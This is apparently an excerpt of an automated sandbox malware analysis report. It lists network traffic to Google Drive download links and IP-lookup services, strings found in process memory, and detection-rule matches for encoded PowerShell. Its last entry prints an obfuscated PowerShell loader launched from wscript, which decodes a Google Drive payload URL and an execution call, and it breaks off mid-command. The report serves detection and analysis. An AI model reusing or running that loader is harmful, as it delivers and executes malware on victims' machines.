Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /download?id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1NIu13gYclipFPqq145lj8sWnvpxxfEld HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=1NIu13gYclipFPqq145lj8sWnvpxxfEld&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive |
Source: wscript.exe, 00000001.00000003.1606614767.0000024CCF25F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1607337961.0000024CCF2E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1608061400.0000024CCF2E9000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en |
Source: wscript.exe, 00000001.00000003.1485959953.0000024CD1079000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1486237461.0000024CD10A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1606614767.0000024CCF25F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1485193301.0000024CD10A6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1607337961.0000024CCF2E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1608061400.0000024CCF2E9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1608193930.0000024CD0FF0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab |
Source: wscript.exe, 00000001.00000003.1486237461.0000024CD10A0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d4733d4e148b3 |
Source: wscript.exe, 00000001.00000003.1486091804.0000024CD102D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1486237461.0000024CD1055000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d4733d4e14 |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.google.com |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB4E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://drive.usercontent.google.com |
Source: powershell.exe, 00000003.00000002.2255196351.00000250CBDD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000007.00000002.2051623128.0000000004C08000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BBD61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2051623128.0000000004AB1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000007.00000002.2051623128.0000000004C08000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BBD61000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 00000007.00000002.2051623128.0000000004AB1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://apis.google.com |
Source: powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB10000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.googPz |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BBF87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BD61A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BBF87000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5P |
Source: powershell.exe, 00000007.00000002.2051623128.0000000004C08000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.google.com/uc?export=download&id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5XR |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.googh |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1EC000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1EC000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://drive.usercontent.google.com/download?id=1OSQaZlkr_7hzp0lSFB9dj3gxcEot-9s5&export=download |
Source: powershell.exe, 00000007.00000002.2051623128.0000000004C08000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BCFF7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000003.00000002.2255196351.00000250CBDD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2054965837.0000000005B1A000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://ssl.gstatic.com |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google-analytics.com;report-uri |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.googletagmanager.com |
Source: powershell.exe, 00000003.00000002.2157807692.00000250BDB3B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB14000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BDB37000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2157807692.00000250BC1E8000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://www.gstatic.com |
Source: unknown |
Network traffic detected: HTTP traffic on port 49707 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49705 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49707 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49716 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49717 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49705 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49714 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49716 |
Source: unknown |
Network traffic detected: HTTP traffic on port 49717 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49714 |
Source: amsi32_1836.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 6816, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 1836, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. 
At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns |